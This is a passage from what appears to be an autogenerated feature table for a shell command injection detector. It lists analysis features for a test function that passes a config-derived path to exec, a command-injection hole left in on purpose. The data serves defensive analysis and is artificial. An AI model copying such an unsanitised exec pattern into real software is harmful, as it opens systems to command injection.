name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:13 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:13 | cmd | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:13 | cmd | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:13 | cmd | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:13 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd = p ... ry -v') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd = p ... ry -v') | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd = p ... ry -v') | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd = p ... ry -v') | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:11:478:62 | cmd = p ... ry -v') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:20 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:20 | path | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:20 | path | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:20 | path | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:20 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:25 | path.join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:25 | path.join | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:25 | path.join | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:25 | path.join | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:25 | path.join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | exceptional return of path.jo ... ry -v') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | exceptional return of path.jo ... ry -v') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | exceptional return of path.jo ... ry -v') | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | exceptional return of path.jo ... ry -v') | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | exceptional return of path.jo ... ry -v') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:22:478:25 | join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:22:478:25 | join | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:22:478:25 | join | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:22:478:25 | join | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:22:478:25 | join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:32 | config | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:32 | config | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:32 | config | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:32 | config | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:32 | config | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:27:478:46 | config.installedPath | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:34:478:46 | installedPath | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:34:478:46 | installedPath | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:34:478:46 | installedPath | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:34:478:46 | installedPath | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:34:478:46 | installedPath | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:49:478:61 | 'myBinary -v' | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:15 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:15 | exec | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:15 | exec | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| 